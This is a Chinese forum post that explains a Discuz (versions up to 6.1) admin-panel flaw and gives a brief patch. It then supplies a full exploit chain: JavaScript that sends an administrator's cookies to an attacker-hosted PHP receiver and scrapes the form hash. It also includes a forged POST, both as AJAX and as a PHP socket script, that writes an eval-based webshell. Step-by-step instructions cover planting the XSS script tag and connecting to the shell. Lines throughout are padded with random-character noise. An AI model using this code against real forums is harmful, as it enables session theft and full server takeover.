Discuz XSS得webshell% t% |2 A! G- u2 p; F$ A0 u
By racle @tian6.com
- D# x0 k9 `8 @+ b欢迎转帖.但请保留版权信息.
: b3 c* J+ N( |* m& \! G受影响版本iscuz<=6.1.0,gbk+utf+big5" |% e8 w9 j9 t
; M0 c4 c" ~) l6 K: f* U新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.8 d- s$ d3 X2 m
0 J9 s3 A& O% Z
. K) v$ W3 F4 L8 ]) M; N
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706) X3 N+ y) q$ Q
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.6 O6 S8 _! h! Y+ b2 b
2 v( }& u- H1 O$ M; |
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
8 R# F: n7 L7 M" v本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
, ?* A9 s+ d' q$ j' M2 a1 W. R M: Q8 Y/ M7 F
+ L8 v/ P; b, \6 `9 y8 z" D) q
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------0 B% x& L2 [7 H2 s7 E
% e9 b7 R- Q- W1 s1 J' Y4 w' t
0 z# G' ?; X5 V7 W
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.8 d1 u9 Z" t! i8 H. u$ }2 @
: F9 ?; h5 m4 ?2 d. \" v5 {9 ?
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.9 {; O+ _" B: M+ a
% L% f8 H% K4 \6 i) @+ r
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.% I1 T9 d" Z0 _4 L3 A
2 r0 ?9 }: _. n7 @/ P. N
1 c f d% b2 O! V( D6 a
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {1 \$ a( P. l2 f2 d8 J X' x' N* g
- v1 Q; e! g. T, \& M8 {
global $runwizardfile, $runwizardhistory;3 t/ L: Z' o8 P: a. t- A, k8 f7 }
! J+ [2 W* |% g( X6 j $fp = fopen($runwizardfile, 'w');+ ~: B4 O$ A, m' R, \
# J8 b2 Q4 a t! j. R
fwrite($fp, serialize($runwizardhistory));6 f" }% P/ _+ O) n/ |
f; M2 c+ t- z0 h9 D
fclose($fp);
% W+ _& G, ^; ^3 E+ A- y W. K3 s3 [. B
}$ u3 W# b6 x {! u5 \$ ?6 G& S
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.5 L8 ]3 Q! M4 C( M+ h; x$ m, m
以下是修补的办法:function saverunwizardhistory() {. q: k+ p6 L- u2 K4 r6 B$ Z) G
* v$ ? C, e5 h) v3 P4 j( G
global $runwizardfile, $runwizardhistory;# n# e* E! A7 H4 l
' I: i9 L0 {' k6 H) Z* M $fp = fopen($runwizardfile, 'w');- Q/ \# R2 m" P. L* V
K; O* e, s$ f9 v- ?' L$ }
$s = '<?php exit;?>';; I( \, [& N& I( U- Q" R! n4 V% h
6 O& T9 J* h$ C, ]( M' D
$s .= serialize($runwizardhistory);
2 o9 [+ }: p0 d! E$ @. z
, T$ G) u f1 E% I# ?4 G) Q fwrite($fp, $s);! Y1 c/ o! E' U/ o
5 V* q( F( m1 }6 C) N, V fclose($fp);8 i' I* S& g; J e5 X' _* {0 J
8 Z- Y+ E! r% s}
4 d) r" G8 f% r6 T* Y复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
1 r e0 x; S6 S$ s2 N6 f) d" x; h& b# j9 d! y* U
9 S: V/ G0 e) q6 `& }+ r! o
' ^- I* |, {1 C5 h) @% ]9 _
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
! F& R) ~# \( m4 s! }: I) {2 s% b9 j. Q: j# R% ^
, l" |) w. c& ]9 G- K& P' L
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.% y. d" d6 k, C; _ g* _
3 _3 G* T; v' [, @/ u2 F
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
K9 X# Y9 l5 [
* w1 C# k2 H! z6 i ]/ D这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
: C* D: R( c! V0 Y
3 X' d7 H; L$ f1 ~# \6 [首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
2 x) M( D2 R3 _
8 [; L9 u$ u) f m' Xvar url="http://目标网站/admincp.php";
' l) Y+ n; R" T( s2 ~/ A( ^
+ q9 ?. y+ \' f: O$ V+ X/*获得cookies*/* A( ~4 N- t% n6 T1 ]) M1 U
% W. v+ U, c/ I( u8 z& X4 h
function getURL(s) {; `$ B3 ~9 N4 r& Y/ t( h
) B! ]2 b& {# Q qvar image = new Image();, n U$ X9 E. n' u" Z- x% {
! y' \% }. j( gimage.style.width = 0;
. Q+ e/ j! D3 n/ _7 G/ S% r
- \8 V* @) I: J" U0 v. r4 timage.style.height = 0;
: w4 O' g# r# [" F
* s0 P2 D) A: p2 {2 @image.src = s;" ~9 F4 n0 |8 X5 l
3 [; G* t7 F6 C& Z P
}
- F$ i/ [5 \- k ~) V& Z
+ u+ h' F# G9 \getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
3 q7 x$ R3 y) B& D1 O6 Y% ~3 r% ], n复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];4 t( i" ^( c: x7 k
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 2 U& S0 a7 B3 v1 B3 I; ?+ ~
/ O$ a5 t2 Q% A: W0 R2 T/ o/ t2 G8 g H) l& M0 Q* w; O
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";( V; ^, ?9 N& c
) J1 b" ~8 L' E: Z4 o
: D6 [$ v3 g: L: ^5 S) v- R3 v1 U- d
/*hash*/* ]% Y" R- p1 }, L K4 t# a1 l
9 W3 }6 _7 \+ c/ ], `8 P
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
' n4 s0 @. `! q- k$ X5 H& J
/ u5 E7 P' J: p' d9 f2 mxmlHttpReq.open("GET", url+"admincp.php?action=home", false);
0 ]( L4 x" J" ?9 ~- @3 h2 e( L- k, d" ~0 R# p- E. H
xmlHttpReq.send();
. P. N# i+ J, U# D1 b5 A
+ q: n4 H+ |' Avar resource = xmlHttpReq.responseText;
( m" t6 \! y. k1 r: l; ]$ s+ M; l4 G
var numero = resource.search(/formhash/);
4 f, j# ?5 L" b, @2 y
# c" w* r, R; s5 |3 | uvar formhash=encodeURIComponent(resource.substr(numero+17,8));
" T1 Y! r( \; ^" H. l
6 \( |7 U8 ]5 {' `4 H7 j3 Z* @" A
5 x5 x( J. C/ y
/ l8 D8 K$ E) L9 U1 j- Hvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
3 o0 H. r$ e, f3 D, c2 n5 Y2 D1 N, e7 q U
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
4 ?! G1 S0 ]% X2 l+ x" u+ B5 D
) t8 j9 y. l$ E: b c% V3 S# Z7 ExmlHttpReq.setRequestHeader("Referer", url);' ^( y, ^; o: j- {
. f3 {1 m- n2 u: s6 D- i
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
, r7 {, e) x9 |7 m1 p: m8 Y3 U, z
, b* E/ |, C/ f7 XxmlHttpReq.setrequestheader("content-length",post.length); ) t1 a6 I5 X% y- s( {
' W! T2 J/ c0 T* l; L
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
1 Q- Z6 Y5 `! R; ?4 l" l
3 c$ A3 _8 ?) G1 IxmlHttpReq.send(post);//发送数据
: }5 Y A, \4 D( [复制代码这里HASH我假设正确,这样提交,也无须cookies) R3 p B2 d; C. W
9 _8 \* Q N' a; F6 u( _再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
' P0 Y: i! x! _; l8 Y' `3 W0 K3 P
# _) U3 a" @3 ~. }- L6 i) x5 Dif (!$sock) die("$errstr ($errno)\n");& e$ O" i4 g7 u- M( `: o
% x2 X) P5 Y. _. i6 c! \
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
; r0 ^7 k9 Q! K0 ]
1 Z9 k7 f0 P" \8 O: j3 _" a7 {, ^- l
0 b( l0 a& `4 [ K: o1 h$ o* ^) ]fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
) q5 c: f, ?2 @
: z' d+ i( D' Lfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
+ g4 T4 h4 j5 z& }4 L! s# M- ^2 S( q J9 z
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
' v% P) _+ e6 {# i6 H
: E7 x! l$ T. K U2 E/ [. gfwrite($sock, "Accept-Language: zh-cn\r\n");
( H T1 g( c9 b9 G" U% Y
* Y6 @2 [1 [: A" Efwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");' e% Q# L5 I/ C
5 I: a: P H, r! v, nfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");6 \/ P) P( U8 g' Q1 n; R
: p$ [& o+ e" V; q
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");7 r; f: m: X6 h7 P1 q! ~
8 f/ v5 W0 G9 B8 G- ^8 gfwrite($sock, "Host: $url\r\n");8 N0 s9 g$ D5 r# u. X
7 @! I* L' @" ~+ pfwrite($sock, "Content-Length: ".strlen($data)."\r\n");- c+ Q& B: [+ e) f
8 k! k) f! u% z: p% Z
fwrite($sock, "Connection: Keep-Alive\r\n");
2 F G5 y7 Q. X
9 [8 w( c2 F: U4 h+ d6 e+ Kfwrite($sock, "Cache-Control: no-cache\r\n");
# a8 [. c0 @6 N7 s9 c6 `2 R. x4 O" {+ W" I. `5 i- I
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
U. M3 ^$ _9 z1 P1 p
1 r# R) u2 Q5 ~fwrite($sock, $data);
2 L* O4 R* z/ ^
; ]6 X* [2 f, m: Y, w3 Y5 y3 M. g
7 N0 Y8 V/ a6 Z! f- e7 T0 x% M& x$headers = "";
- D w T" V: w$ z2 e8 u# a: }, ~* X: y6 `+ L) f
while ($str = trim(fgets($sock, 4096)))* P4 e- X4 Z) s( P8 ^
& r0 @/ t; D n% T# ]# G $headers .= "$str\n";
! ~3 Y5 U# B2 e6 {+ }7 x5 l# y/ m4 P! i# w% \+ [! a* E
echo "\n";/ I- `4 {0 J* l& X2 n: x* T# M) f
/ }0 k$ _0 h9 H2 i/ N$body = "";
. R4 m+ H; i" h; b& M# Y
% @" Z4 p3 K& cwhile (!feof($sock))
u8 t# k- ^0 t7 @3 e' R
% k8 [5 _8 K) y8 ~5 F; I $body .= fgets($sock, 4096);1 b0 y% L/ }4 J+ Y+ T. s8 e
" t0 s5 L$ e0 C$ nfclose($sock);: e1 _% y% z$ E# q; H
6 n- M5 ]9 j! L3 c) D
echo $body;
$ O2 _8 w) R) d" k/ t* ~ `2 h& }5 t- y复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
+ M" v2 F* K; ]& w L: L3 y
+ `7 f% a) x, @ F
% m9 p* |. P: C3 ?-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
6 Q2 y$ o* f3 ^1 A8 g0 y( y0 G' [5 M$ y' j# S" K) c7 a
+ @% q+ l* n! s( F3 D8 z1HP SOCKET利用方法首先打开racle.js
! N3 ~# L! A( h" o1 q& O4 E- ?* e
+ x# b+ Q1 ?( R1 |( Svar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home& P6 h! ?) R+ c s" U
5 s/ M4 e& j% a- \; O* E
, _% |$ U6 y$ C) v# g
8 a2 G% ]" R5 @) z; t0 N. L然后打开racle@tian6.php
9 [+ S% M& m' ]4 j: _0 Z' I; C0 i9 Z
& D2 a( E2 d% @* Q9 }0 W$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
0 Z( k) N% g! t6 s
$ r1 I2 B- e0 n7 }$ W% |
! \6 f* |, n- r8 _: h. G N: e
- |3 S3 W# O& T' u2 Q如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
3 g. Z' L* E" S
]/ g% [) j. MgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
' U, K' d! @9 D1 [$ D* Z" F: Z
1 L$ d7 q/ m' j) o: `# H, c5 _为
+ H; n4 v. k1 b, n" c
* v s+ Y/ z" E$ Z! y! j2 U1 H8 NgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
' V, w7 g0 n. a6 O! ?2 I复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址." E; A. h- f* n7 |
8 z- {5 o# c2 J* b: p
2 u0 ~6 z/ e; P# y3 K# K5 O
1 e. O0 P9 v4 R" W5 M如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:0 j% |6 d( t5 s B+ k) i- q
6 x+ h9 d4 i; z% H6 ?7 Mvar formhash=encodeURIComponent(resource.substr(numero+17,8));/ m3 q; @& K5 o
$ w! i* l/ ~: [: u+ j u# t6 O为2 ]: `1 B$ E' R5 C. u
$ Q5 V, A* v! f8 x h9 [
var formhash=encodeURIComponent(resource.substr(numero+9,8));. I6 O! M; W4 x V
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.! U1 |% H4 k' q) k- C8 \* O
, m. Q. G7 E( j3 e5 {0 B4 c2 r/ x: |
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.% v( s/ y+ Q& W E2 h0 H% M
0 |0 r$ a& K- X
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点./ [& X( u/ e9 L" r
" l( E; v$ N' s/ \0 P, b不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
, C. P/ `' R1 w i" [
5 ?. l7 j! L' L, z |